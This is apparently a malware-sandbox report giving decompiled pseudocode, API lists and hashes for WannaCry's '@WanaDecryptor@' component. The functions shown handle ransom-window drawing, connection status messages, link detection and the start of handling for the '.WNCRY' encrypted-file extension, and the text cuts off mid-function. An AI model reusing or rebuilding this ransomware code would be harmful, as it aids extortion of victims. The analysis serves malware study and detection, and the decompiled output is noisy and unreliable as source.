                                                      				struct HDC__* _t84;
                                                      				char _t85;
                                                      				struct HBRUSH__* _t86;
                                                      				intOrPtr _t89;
                                                      				intOrPtr _t90;
                                                      				intOrPtr _t102;
                                                      				intOrPtr _t104;
                                                      				intOrPtr _t108;
                                                      				intOrPtr _t136;
                                                      				void* _t151;
                                                      				struct HBRUSH__* _t152;
                                                      				void* _t153;
                                                      				void* _t156;
                                                      				int _t160;
                                                      				intOrPtr _t162;
                                                      
                                                      				_push(0xffffffff);
                                                      				_push(E00413943);
                                                      				_push( *[fs:0x0]);
                                                      				 *[fs:0x0] = _t162;
                                                      				_t156 = __ecx;
                                                      				_t78 = GetClientRect( *(__ecx + 0x20),  &_v112);
                                                      				_t160 = 0;
                                                      				_v204 = 0;
                                                      				_t108 =  *((intOrPtr*)( *((intOrPtr*)(_t156 + 0x44)) - 8));
                                                      				_v176 = _t108;
                                                      				if(_t108 != 0) {
                                                      					L00412DD0();
                                                      					_t79 =  *(_t156 + 0x50);
                                                      					_v8 = 0;
                                                      					_v164 = 0xffb53f;
                                                      					_v160.left = _t79;
                                                      					_v160.top = 0x674017;
                                                      					_v160.right =  *((intOrPtr*)(_t156 + 0x4c));
                                                      					_v160.bottom = 0;
                                                      					_v144 =  *(_t156 + 0x54);
                                                      					L00412E5A();
                                                      					_t80 =  *((intOrPtr*)(_t79 + 8));
                                                      					__imp__#8(_t80,  *((intOrPtr*)(_t156 + 0x58)), 0,  &_v164, 3, _t156, _t151);
                                                      					_t152 = _t80;
                                                      					_v220 = _t152;
                                                      					L00412E54();
                                                      					asm("sbb eax, eax");
                                                      					_v28 = 1;
                                                      					_t84 = CreateCompatibleDC( ~( &_v120) & _v116);
                                                      					_push(_t84);
                                                      					L00412E4E();
                                                      					_push(_t152);
                                                      					L00412DE2();
                                                      					if(_t84 != 0) {
                                                      						_t84 =  *(_t84 + 4);
                                                      					}
                                                      					_push(_t84);
                                                      					_t85 = _v224;
                                                      					_push(_t85);
                                                      					L00412E48();
                                                      					_v212 = _t85;
                                                      					_t153 = 0;
                                                      					_v252 = 1;
                                                      					_t86 = CreateSolidBrush( *(_t156 + 0x54));
                                                      					_v220 = _t86;
                                                      					FillRect(_v140,  &_v160, _t86);
                                                      					_t89 = 0;
                                                      					_v260 = 0;
                                                      					if(_t108 > 0) {
                                                      						do {
                                                      							_v224 =  *((intOrPtr*)( *((intOrPtr*)(_t156 + 0x44)) + _t89));
                                                      							E00405110(_t156,  &_v188, _v224);
                                                      							asm("sbb eax, eax");
                                                      							BitBlt(_v160, _t160, _v272,  *((intOrPtr*)(_t156 + 0x60)) +  *((intOrPtr*)(_t156 + 0x68)),  *((intOrPtr*)(_t156 + 0x64)) +  *((intOrPtr*)(_t156 + 0x6c)),  ~( &_v260) & _v256, _v196, _v192, 0xcc0020);
                                                      							_t102 =  *((intOrPtr*)(_t156 + 0x74));
                                                      							_t160 = _t160 +  *((intOrPtr*)(_t156 + 0x60)) +  *((intOrPtr*)(_t156 + 0x68));
                                                      							_t153 = _t153 + 1;
                                                      							if(_t153 != _t102) {
                                                      								goto L10;
                                                      							} else {
                                                      								_t136 =  *((intOrPtr*)(_t156 + 0x70));
                                                      								if(_t136 != 1) {
                                                      									if(_t153 != _t102) {
                                                      										goto L10;
                                                      									} else {
                                                      										_t104 = _t136;
                                                      										if(_t104 <= 1) {
                                                      											goto L10;
                                                      										} else {
                                                      											if(_v304 != _t104) {
                                                      												_t153 = 0;
                                                      												_t160 = 0;
                                                      												_v300 = _v300 +  *((intOrPtr*)(_t156 + 0x64)) +  *((intOrPtr*)(_t156 + 0x6c));
                                                      												_v304 = _v304 + 1;
                                                      												goto L10;
                                                      											}
                                                      										}
                                                      									}
                                                      								}
                                                      							}
                                                      							goto L11;
                                                      							L10:
                                                      							_t89 = _v296 + 1;
                                                      							_v296 = _t89;
                                                      						} while (_t89 < _v272);
                                                      					}
                                                      					L11:
                                                      					_t90 = _v228;
                                                      					if(_t90 != 0) {
                                                      						_t90 =  *((intOrPtr*)(_t90 + 4));
                                                      					}
                                                      					_push(_t90);
                                                      					_push(_v248);
                                                      					L00412E48();
                                                      					L00412E42();
                                                      					DeleteObject(_v264);
                                                      					_t78 = DeleteObject(_v244);
                                                      					_v80 = 0;
                                                      					L00412E3C();
                                                      					_v80 = 0xffffffff;
                                                      					L00412DB8();
                                                      				}
                                                      				 *[fs:0x0] = _v12;
                                                      				return _t78;
                                                      			}


                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 0000001C.00000002.4450384819.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000001C.00000002.4450341169.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 0000001C.00000002.4450550901.0000000000415000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 0000001C.00000002.4450641363.000000000041F000.00000008.00000001.01000000.00000009.sdmp
                                                      • Associated: 0000001C.00000002.4450693015.0000000000421000.00000004.00000001.01000000.00000009.sdmp
                                                      • Associated: 0000001C.00000002.4450741084.0000000000423000.00000002.00000001.01000000.00000009.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_28_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: #5785CreateDeleteObjectRect$#1168#1640#2405#2860#323#470#640#755BrushClientCompatibleFillSolid
                                                      • String ID:
                                                      • API String ID: 1233696098-0
                                                      • Opcode ID: 3787f29b2f3b6759b14921245bb0c5350f6533f71f74a9e78965702df0d7f065
                                                      • Instruction ID: b627e9c1237585dd637a27707791d59f98fdace04f8481d3914a5fbe5096edf5
                                                      • Opcode Fuzzy Hash: 3787f29b2f3b6759b14921245bb0c5350f6533f71f74a9e78965702df0d7f065
                                                      • Instruction Fuzzy Hash: 057135716087419FC324DF69C984AABB7E9FB88704F004A2EF59AC3350DB74E845CB66
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 75%
                                                      			E00408D70(intOrPtr __ecx, signed long long __fp0, intOrPtr* _a4, int _a8, signed int _a12, unsigned int _a16, signed int _a20) {
                                                      				intOrPtr _v0;
                                                      				unsigned int _v4;
                                                      				unsigned int _v8;
                                                      				unsigned int _v12;
                                                      				intOrPtr _v20;
                                                      				char _v36;
                                                      				intOrPtr _v56;
                                                      				char _v60;
                                                      				intOrPtr _v64;
                                                      				char _v68;
                                                      				unsigned int _v72;
                                                      				signed int _v76;
                                                      				signed int _v80;
                                                      				intOrPtr _v84;
                                                      				signed int _v88;
                                                      				signed int _v92;
                                                      				signed int _v96;
                                                      				signed long long _v100;
                                                      				intOrPtr _v104;
                                                      				void* _v108;
                                                      				void* _v112;
                                                      				void* _v120;
                                                      				unsigned int _t93;
                                                      				signed int _t96;
                                                      				signed int _t100;
                                                      				unsigned int _t102;
                                                      				signed int _t107;
                                                      				int _t112;
                                                      				char _t113;
                                                      				signed char _t115;
                                                      				RECT* _t122;
                                                      				signed int _t125;
                                                      				signed int _t134;
                                                      				intOrPtr* _t135;
                                                      				unsigned int _t138;
                                                      				signed int _t140;
                                                      				signed int _t143;
                                                      				intOrPtr* _t146;
                                                      				char _t151;
                                                      				char _t152;
                                                      				signed int _t169;
                                                      				intOrPtr* _t177;
                                                      				signed int _t192;
                                                      				intOrPtr* _t193;
                                                      				intOrPtr _t195;
                                                      				unsigned int _t202;
                                                      				char _t209;
                                                      				intOrPtr _t210;
                                                      				signed long long _t228;
                                                      				signed long long _t229;
                                                      				signed long long _t230;
                                                      				signed long long _t231;
                                                      				signed long long _t234;
                                                      
                                                      				_t228 = __fp0;
                                                      				_push(0xffffffff);
                                                      				_push(E004140A0);
                                                      				_push( *[fs:0x0]);
                                                      				 *[fs:0x0] = _t210;
                                                      				_t93 = _a20;
                                                      				_v104 = __ecx;
                                                      				_t138 = _a16;
                                                      				_t169 = _t138 & 0x000000ff;
                                                      				_v76 = _t169;
                                                      				_t192 = (_t93 & 0x000000ff) - _t169;
                                                      				_t140 = _t138 >> 0x00000010 & 0x000000ff;
                                                      				_t96 = (_t93 >> 0x00000010 & 0x000000ff) - _t140;
                                                      				_v88 = 0;
                                                      				_v96 = _t96;
                                                      				_v92 = _t140;
                                                      				asm("cdq");
                                                      				_t143 = _t96 ^ 0;
                                                      				_v100 = 0;
                                                      				asm("cdq");
                                                      				_a20 = _t192;
                                                      				_t134 = 0;
                                                      				if(0 <= _t143) {
                                                      					_t134 = _t143;
                                                      				}
                                                      				asm("cdq");
                                                      				_t100 = _t192 ^ 0;
                                                      				if(_t100 <= _t134) {
                                                      					_a16 = 0;
                                                      					if(0 <= _t143) {
                                                      						_a16 = _t143;
                                                      					}
                                                      				} else {
                                                      					_a16 = _t100;
                                                      				}
                                                      				_t193 = _a8;
                                                      				_t102 =  *((intOrPtr*)(_t193 + 8)) -  *_t193;
                                                      				if(_t102 < _a16) {
                                                      					_a16 = _t102;
                                                      				}
                                                      				if(_a16 == 0) {
                                                      					_a16 = 1;
                                                      				}
                                                      				asm("fild dword [esp+0x88]");
                                                      				asm("fild dword [esp+0x8c]");
                                                      				_t135 = _a4;
                                                      				_t229 = _t228 / st1;
                                                      				_v80 = _t229;
                                                      				asm("fild dword [esp+0x1c]");
                                                      				_t230 = _t229 / st1;
                                                      				_v100 = _t230;
                                                      				asm("fild dword [esp+0x20]");
                                                      				_t231 = _t230 / st1;
                                                      				_v96 = _t231;
                                                      				st0 = _t231;
                                                      				_t107 = GetDeviceCaps( *( *_t135 + 8), 0x26) & 0x00000100;
                                                      				_v80 = _t107;
                                                      				if(_t107 == 0 && _a8 > 1) {
                                                      					_t125 = GetDeviceCaps( *( *_t135 + 8), 0xc);
                                                      					if(GetDeviceCaps( *( *_t135 + 8), 0xe) * _t125 < 8) {
                                                      						_v8 = 1;
                                                      					}
                                                      				}
                                                      				_t146 = _t193;
                                                      				_a12 =  *((intOrPtr*)(_t193 + 8)) -  *_t193;
                                                      				_t202 = 0;
                                                      				asm("fild dword [esp+0x8c]");
                                                      				_v72 = 0;
                                                      				_v68 =  *_t146;
                                                      				_v76 = 0x415a44;
                                                      				asm("fidiv dword [esp+0x88]");
                                                      				_v64 =  *((intOrPtr*)(_t146 + 4));
                                                      				_v60 =  *((intOrPtr*)(_t146 + 8));
                                                      				_v56 =  *((intOrPtr*)(_t146 + 0xc));
                                                      				_a12 = _t231;
                                                      				_t112 = _a8;
                                                      				_v12 = 0;
                                                      				_v4 = 0;
                                                      				if(_t112 <= 0) {
                                                      					L31:
                                                      					_v76 = 0x415c00;
                                                      					_v12 = 1;
                                                      					L00412D52();
                                                      					 *[fs:0x0] = _v20;
                                                      					return _t112;
                                                      				} else {
                                                      					while(1) {
                                                      						asm("fild dword [esp+0x7c]");
                                                      						_t195 =  *_t193;
                                                      						L0041304A();
                                                      						_t46 = _t202 + 1; // 0x1
                                                      						_v4 = _t46;
                                                      						_t209 = _t112 + _t195;
                                                      						asm("fild dword [esp+0x7c]");
                                                      						_v68 = _t209;
                                                      						_t234 = st0 * _a12 * _a12;
                                                      						L0041304A();
                                                      						_t113 = _t112 + _t195;
                                                      						_v60 = _t113;
                                                      						if(_t202 == _a8 - 1) {
                                                      							_t113 =  *((intOrPtr*)(_v0 + 8));
                                                      							_v60 = _t113;
                                                      						}
                                                      						_t177 = _a4;
                                                      						_t151 =  *_t177;
                                                      						if(_t113 < _t151) {
                                                      							goto L29;
                                                      						}
                                                      						if(_t209 < _t151) {
                                                      							_v68 = _t151;
                                                      						}
                                                      						_t152 =  *((intOrPtr*)(_t177 + 8));
                                                      						if(_t113 > _t152) {
                                                      							_v60 = _t152;
                                                      						}
                                                      						L0041304A();
                                                      						_v92 = 0;
                                                      						L0041304A();
                                                      						_t115 = _t113 + _v100 + _v96;
                                                      						_v92 = _t115 << 8;
                                                      						L0041304A();
                                                      						_push(_t115 + _v84 & 0x000000ff | _v92);
                                                      						if(_v80 == 0) {
                                                      							_t112 = E00409D40( &_v36, _t135,  &_v68);
                                                      							_push(_t112);
                                                      							L00412FF2();
                                                      						} else {
                                                      							_push(CreateSolidBrush());
                                                      							L00412D5E();
                                                      							_t122 = E00409D40( &_v60, _t135,  &_v76);
                                                      							_t76 =  &_v96; // 0x415a44
                                                      							asm("sbb ecx, ecx");
                                                      							_t112 = FillRect( *( *_t135 + 4), _t122,  ~_t76 & _v92);
                                                      							L00412D52();
                                                      						}
                                                      						if(_v68 <  *((intOrPtr*)(_v4 + 8))) {
                                                      							L30:
                                                      							_t202 = _v4;
                                                      							_t112 = _a8;
                                                      							_v4 = _t202;
                                                      							if(_t202 < _t112) {
                                                      								_t193 = _v0;
                                                      								continue;
                                                      							}
                                                      						}
                                                      						goto L31;
                                                      						L29:
                                                      						st0 = _t234;
                                                      						goto L30;
                                                      					}
                                                      				}
                                                      			}

                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000001C.00000002.4450384819.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000001C.00000002.4450341169.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 0000001C.00000002.4450550901.0000000000415000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 0000001C.00000002.4450641363.000000000041F000.00000008.00000001.01000000.00000009.sdmp
                                                      • Associated: 0000001C.00000002.4450693015.0000000000421000.00000004.00000001.01000000.00000009.sdmp
                                                      • Associated: 0000001C.00000002.4450741084.0000000000423000.00000002.00000001.01000000.00000009.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_28_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: _ftol$CapsDevice$#2414$#1641#2754BrushCreateFillRectSolid
                                                      • String ID: DZA
                                                      • API String ID: 2487345631-3378329814
                                                      • Opcode ID: 46f8ac59b565287c612820a18e91b1c7afa6038287a955736cfc91f47d65fae1
                                                      • Instruction ID: dda82c2241e8f2351b86cfb5efeedf8da928c70a362fdc9ee550b763b14e0e54
                                                      • Opcode Fuzzy Hash: 46f8ac59b565287c612820a18e91b1c7afa6038287a955736cfc91f47d65fae1
                                                      • Instruction Fuzzy Hash: 2CA147716087418FC324DF25C984AAABBE1FFC8704F148A2EF599D7291DA39D845CF86
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 65%
                                                      			E00401600(void* __ecx, intOrPtr _a4, long _a8, intOrPtr _a12) {
                                                      				void* _t19;
                                                      				long _t21;
                                                      				long _t24;
                                                      				void* _t25;
                                                      				void* _t26;
                                                      				intOrPtr _t27;
                                                      				long _t48;
                                                      				void* _t49;
                                                      				intOrPtr _t50;
                                                      
                                                      				_t27 = _a4;
                                                      				_t48 = _a8;
                                                      				_t19 = _t27 - 0x4e20;
                                                      				_t49 = __ecx;
                                                      				if(_t19 == 0) {
                                                      					if(_t48 != 0) {
                                                      						if(_t48 == 0xffffffff) {
                                                      							goto L14;
                                                      						}
                                                      						goto L15;
                                                      					} else {
                                                      						_push(__ecx);
                                                      						_a4 = _t50;
                                                      						L00412CAA();
                                                      						E00401970("Connected");
                                                      						_t21 = SendMessageA( *(_t49 + 0x80), 0x402, 0x1e, _t48);
                                                      						_push(_a4);
                                                      						_push(_t48);
                                                      						_push(_t27);
                                                      						 *(_t49 + 0xb0) = 0x23;
                                                      						L00412BAE();
                                                      						return _t21;
                                                      					}
                                                      				} else {
                                                      					_t19 = _t19 - 1;
                                                      					if(_t19 == 0) {
                                                      						if(_t48 != 0) {
                                                      							goto L9;
                                                      						} else {
                                                      							_push(__ecx);
                                                      							_a4 = _t50;
                                                      							L00412CAA();
                                                      							E00401970("Sent request");
                                                      							_t24 = SendMessageA( *(_t49 + 0x80), 0x402, 0x23, _t48);
                                                      							_push(_a4);
                                                      							_push(_t48);
                                                      							_push(_t27);
                                                      							 *(_t49 + 0xb0) = 0x28;
                                                      							L00412BAE();
                                                      							return _t24;
                                                      						}
                                                      					} else {
                                                      						_t19 = _t19 - 1;
                                                      						if(_t19 != 0) {
                                                      							L15:
                                                      							_push(_a12);
                                                      							_push(_t48);
                                                      							_push(_t27);
                                                      							L00412BAE();
                                                      							return _t19;
                                                      						} else {
                                                      							if(_t48 != 0) {
                                                      								if(_t48 != 1) {
                                                      									L9:
                                                      									if(_t48 == 0xffffffff) {
                                                      										L14:
                                                      										 *((intOrPtr*)(_t49 + 0xa8)) = 0xffffffff;
                                                      									}
                                                      									goto L15;
                                                      								} else {
                                                      									_push(__ecx);
                                                      									_a4 = _t50;
                                                      									L00412CAA();
                                                      									_t25 = E00401970("Succeed");
                                                      									_push(_a4);
                                                      									_push(_t48);
                                                      									_push(_t27);
                                                      									L00412BAE();
                                                      									return _t25;
                                                      								}
                                                      							} else {
                                                      								_push(__ecx);
                                                      								_a4 = _t50;
                                                      								L00412CAA();
                                                      								_t26 = E00401970("Received response");
                                                      								_push(_a4);
                                                      								_push(_t48);
                                                      								_push(_t27);
                                                      								 *((intOrPtr*)(_t49 + 0xa8)) = 1;
                                                      								L00412BAE();
                                                      								return _t26;
                                                      							}
                                                      						}
                                                      					}
                                                      				}
                                                      			}

                                                      APIs
                                                      • #2385.MFC42 ref: 00401653
                                                      • #537.MFC42(Received response), ref: 00401634
                                                        • Part of subcall function 00401970: #3092.MFC42(00000406,?,00000000,004134D8,000000FF,00401199,Connecting to server...), ref: 00401997
                                                        • Part of subcall function 00401970: #6199.MFC42(00000406,?,00000000,004134D8,000000FF,00401199,Connecting to server...), ref: 0040199E
                                                        • Part of subcall function 00401970: #800.MFC42(00000406,?,00000000,004134D8,000000FF,00401199,Connecting to server...), ref: 004019AF
                                                      • #537.MFC42(Succeed), ref: 0040166F
                                                      • #2385.MFC42(?,?,?,Succeed), ref: 00401684
                                                      • #537.MFC42(Sent request), ref: 0040169F
                                                      • SendMessageA.USER32(?,00000402,00000023,?), ref: 004016BA
                                                      • #2385.MFC42 ref: 004016D3
                                                      • #537.MFC42(Connected), ref: 004016F5
                                                      • SendMessageA.USER32(?,00000402,0000001E,?), ref: 00401710
                                                      • #2385.MFC42 ref: 00401729
                                                      • #2385.MFC42(?,?,?), ref: 0040174C
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000001C.00000002.4450384819.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000001C.00000002.4450341169.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 0000001C.00000002.4450550901.0000000000415000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 0000001C.00000002.4450641363.000000000041F000.00000008.00000001.01000000.00000009.sdmp
                                                      • Associated: 0000001C.00000002.4450693015.0000000000421000.00000004.00000001.01000000.00000009.sdmp
                                                      • Associated: 0000001C.00000002.4450741084.0000000000423000.00000002.00000001.01000000.00000009.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_28_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: #2385$#537$MessageSend$#3092#6199#800
                                                      • String ID: Connected$Received response$Sent request$Succeed
                                                      • API String ID: 3790904636-3692714192
                                                      • Opcode ID: 77cbd13b205d5b60acded2d534e2f67ef19f14b7a7dcd1ce5799653af05fca91
                                                      • Instruction ID: e9690c31fbc1831b63af9a5cc079f352e9ea826ed21b4fe1124c0ccffc889961
                                                      • Opcode Fuzzy Hash: 77cbd13b205d5b60acded2d534e2f67ef19f14b7a7dcd1ce5799653af05fca91
                                                      • Instruction Fuzzy Hash: A631E8B130430067C5209F1AD959EAF7B69EBD4BB4F10852FF149A33D1CA795C4582FA
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 78%
                                                      			E00404DD0(void* __ecx) {
                                                      				intOrPtr _t12;
                                                      				long _t13;
                                                      				struct HFONT__* _t15;
                                                      				long _t16;
                                                      				long _t17;
                                                      				int _t29;
                                                      				int _t32;
                                                      				int _t35;
                                                      
                                                      				L00412CB0();
                                                      				_t12 =  *0x42189c; // 0x0
                                                      				_t13 =  *(_t12 + 0x824);
                                                      				 *(__ecx + 0x6c) = _t13;
                                                      				_push(CreateSolidBrush(_t13));
                                                      				L00412D5E();
                                                      				_t35 = __ecx + 0x70;
                                                      				_t15 = CreateFontA(0x10, 0, 0, 0, 0x2bc, 0, 0, 0, 0, 0, 0, 0, 0x20, "Arial");
                                                      				_push(_t15);
                                                      				L00412D5E();
                                                      				_push(0x403);
                                                      				L00412CE6();
                                                      				if(_t35 != 0) {
                                                      					_t29 =  *(_t35 + 4);
                                                      				} else {
                                                      					_t29 = 0;
                                                      				}
                                                      				_t16 = SendMessageA( *(_t15 + 0x20), 0x30, _t29, 1);
                                                      				_push(1);
                                                      				L00412CE6();
                                                      				if(_t35 != 0) {
                                                      					_t32 =  *(_t35 + 4);
                                                      				} else {
                                                      					_t32 = 0;
                                                      				}
                                                      				_t17 = SendMessageA( *(_t16 + 0x20), 0x30, _t32, 1);
                                                      				_push(2);
                                                      				L00412CE6();
                                                      				if(_t35 != 0) {
                                                      					SendMessageA( *(_t17 + 0x20), 0x30,  *(_t35 + 4), 1);
                                                      					return 1;
                                                      				} else {
                                                      					SendMessageA( *(_t17 + 0x20), 0x30, _t35, 1);
                                                      					return 1;
                                                      				}
                                                      			}











                                                      APIs
                                                      • #4710.MFC42 ref: 00404DD5
                                                      • CreateSolidBrush.GDI32(?), ref: 00404DE9
                                                      • #1641.MFC42(00000000), ref: 00404DF3
                                                      • CreateFontA.GDI32(00000010,00000000,00000000,00000000,000002BC,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000020,Arial), ref: 00404E1D
                                                      • #1641.MFC42(00000000), ref: 00404E26
                                                      • #3092.MFC42(00000403,00000000), ref: 00404E32
                                                      • SendMessageA.USER32(?,00000030,?,00000001), ref: 00404E51
                                                      • #3092.MFC42(00000001), ref: 00404E57
                                                      • SendMessageA.USER32(?,00000030,?,00000001), ref: 00404E70
                                                      • #3092.MFC42(00000002), ref: 00404E76
                                                      • SendMessageA.USER32(?,00000030,?,00000001), ref: 00404E88
                                                      • SendMessageA.USER32(?,00000030,?,00000001), ref: 00404E9F
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000001C.00000002.4450384819.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000001C.00000002.4450341169.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 0000001C.00000002.4450550901.0000000000415000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 0000001C.00000002.4450641363.000000000041F000.00000008.00000001.01000000.00000009.sdmp
                                                      • Associated: 0000001C.00000002.4450693015.0000000000421000.00000004.00000001.01000000.00000009.sdmp
                                                      • Associated: 0000001C.00000002.4450741084.0000000000423000.00000002.00000001.01000000.00000009.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_28_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: MessageSend$#3092$#1641Create$#4710BrushFontSolid
                                                      • String ID: Arial
                                                      • API String ID: 1126252797-493054409
                                                      • Opcode ID: 1de1fe04c409b87552040b023bf9e037168031db0fca800ba09ccd0f6b59f890
                                                      • Instruction ID: f8dd995afa615cab71677879a74d6ff7c2e305333cbfc3da3be905e2a6067967
                                                      • Opcode Fuzzy Hash: 1de1fe04c409b87552040b023bf9e037168031db0fca800ba09ccd0f6b59f890
                                                      • Instruction Fuzzy Hash: CC21C6B13507107FE625A764DD86FAA2759BBC8B40F10011EB345AB2D1CAF5EC41879C
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 64%
                                                      			E00406DC0(void* __ecx) {
                                                      				int _v76;
                                                      				int _v80;
                                                      				char _v84;
                                                      				int _v88;
                                                      				long _v92;
                                                      				void* _v96;
                                                      				int _v100;
                                                      				void* _v104;
                                                      				long _t28;
                                                      				void* _t29;
                                                      				struct HWND__* _t30;
                                                      				int _t32;
                                                      				void* _t35;
                                                      				int _t39;
                                                      				long _t47;
                                                      				int _t48;
                                                      				void* _t51;
                                                      
                                                      				_t35 = __ecx;
                                                      				_t48 = 0;
                                                      				_t28 = SendMessageA( *(__ecx + 0x4e0), 0xe, 0, 0);
                                                      				_t47 = _t28;
                                                      				_v96 = 0;
                                                      				_v92 = _t47;
                                                      				_t4 = _t47 + 1; // 0x1
                                                      				L00412CEC();
                                                      				_t51 =  &_v104 + 4;
                                                      				_v88 = _t28;
                                                      				if(_t28 == 0) {
                                                      					return _t28;
                                                      				}
                                                      				_t29 = _t35 + 0x4c0;
                                                      				if(_t29 != 0) {
                                                      					_t30 =  *(_t29 + 0x20);
                                                      				} else {
                                                      					_t30 = 0;
                                                      				}
                                                      				SendMessageA(_t30, 0x44b, _t48,  &_v96);
                                                      				_t32 = _v88;
                                                      				 *((char*)(_t32 + _t47)) = 0;
                                                      				if(_t47 < 0) {
                                                      					L15:
                                                      					_push(_v88);
                                                      					L00412C98();
                                                      					return _t32;
                                                      				} else {
                                                      					do {
                                                      						__imp___strnicmp(_t48 + _v88, "<http://", 8);
                                                      						_t51 = _t51 + 0xc;
                                                      						if(_t32 == 0) {
                                                      							L7:
                                                      							_t48 = _t48 + 1;
                                                      							_t39 = _t48;
                                                      							if(_t48 > _t47) {
                                                      								goto L14;
                                                      							}
                                                      							_t32 = _v88;
                                                      							while( *((char*)(_t48 + _t32)) != 0x3e) {
                                                      								_t48 = _t48 + 1;
                                                      								if(_t48 <= _t47) {
                                                      									continue;
                                                      								}
                                                      								goto L14;
                                                      							}
                                                      							_t32 = _t48;
                                                      							_t48 = _t48 + 1;
                                                      							if(_t32 != 0xffffffff) {
                                                      								_v100 = _t32;
                                                      								_v104 = _t39;
                                                      								SendMessageA( *(_t35 + 0x4e0), 0x437, 0,  &_v104);
                                                      								_t32 = 0x20;
                                                      								_push( &_v84);
                                                      								_v84 = 0x54;
                                                      								_v76 = 0x20;
                                                      								_v80 = 0x20;
                                                      								L00412F4A();
                                                      							}
                                                      							goto L14;
                                                      						}
                                                      						_t32 = _v88;
                                                      						__imp___strnicmp(_t48 + _t32, "<https://", 9);
                                                      						_t51 = _t51 + 0xc;
                                                      						if(_t32 != 0) {
                                                      							goto L14;
                                                      						}
                                                      						goto L7;
                                                      						L14:
                                                      						_t48 = _t48 + 1;
                                                      					} while (_t48 <= _t47);
                                                      					goto L15;
                                                      				}
                                                      			}




















                                                      APIs
                                                      • SendMessageA.USER32(?,0000000E,00000000,00000000), ref: 00406DDC
                                                      • #823.MFC42(00000001,?,?), ref: 00406DEC
                                                      • SendMessageA.USER32(?,0000044B,00000000,?), ref: 00406E1D
                                                      • _strnicmp.MSVCRT ref: 00406E3E
                                                      • _strnicmp.MSVCRT ref: 00406E5A
                                                      • SendMessageA.USER32(?,00000437,00000000,?), ref: 00406EA2
                                                      • #6136.MFC42 ref: 00406EC4
                                                      • #825.MFC42(?), ref: 00406ED7
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000001C.00000002.4450384819.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000001C.00000002.4450341169.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 0000001C.00000002.4450550901.0000000000415000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 0000001C.00000002.4450641363.000000000041F000.00000008.00000001.01000000.00000009.sdmp
                                                      • Associated: 0000001C.00000002.4450693015.0000000000421000.00000004.00000001.01000000.00000009.sdmp
                                                      • Associated: 0000001C.00000002.4450741084.0000000000423000.00000002.00000001.01000000.00000009.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_28_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: MessageSend$_strnicmp$#6136#823#825
                                                      • String ID: <http://$<https://$T
                                                      • API String ID: 1228111698-1216084165
                                                      • Opcode ID: d423051487410fe263d6ec4d138bc8bb6478c9a20731e0d0eb8aa801e432672a
                                                      • Instruction ID: 32e461136b03d60599108953de6477053a568cccd29e118696d71e5d9ed076ef
                                                      • Opcode Fuzzy Hash: d423051487410fe263d6ec4d138bc8bb6478c9a20731e0d0eb8aa801e432672a
                                                      • Instruction Fuzzy Hash: 7E31D6B52043509BD320CF18CC41FABB7E4BB98704F044A3EF98AD7281E678D95987D9
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 72%
                                                      			E00402560(intOrPtr __ecx, WCHAR* _a4) {
                                                      				short _v720;
                                                      				intOrPtr _v724;
                                                      				void* _t21;
                                                      				void* _t22;
                                                      				WCHAR* _t23;
                                                      				void* _t30;
                                                      				short* _t31;
                                                      				intOrPtr* _t32;
                                                      				void* _t34;
                                                      				void* _t36;
                                                      
                                                      				_t23 = _a4;
                                                      				_v724 = __ecx;
                                                      				_t30 = 0;
                                                      				wcscpy( &_v720, _t23);
                                                      				_t31 = wcsrchr( &_v720, 0x2e);
                                                      				_t34 =  &_v724 + 0x10;
                                                      				if(_t31 == 0) {
                                                      					L4:
                                                      					wcscat( &_v720, L".org");
                                                      				} else {
                                                      					_t32 = __imp___wcsicmp;
                                                      					_t21 =  *_t32(_t31, L".WNCRY");
                                                      					_t36 = _t34 + 8;
                                                      					if(_t21 == 0) {
                                                      						L3:
                                                      						 *_t31 = 0;
                                                      						_t30 = 1;
                                                      					} else {
                                                      						_t22 =  *_t32(_t31, L".WNCYR");
                                                      						_t34 = _t36 + 8;
                                                      						if(_t22 != 0) {
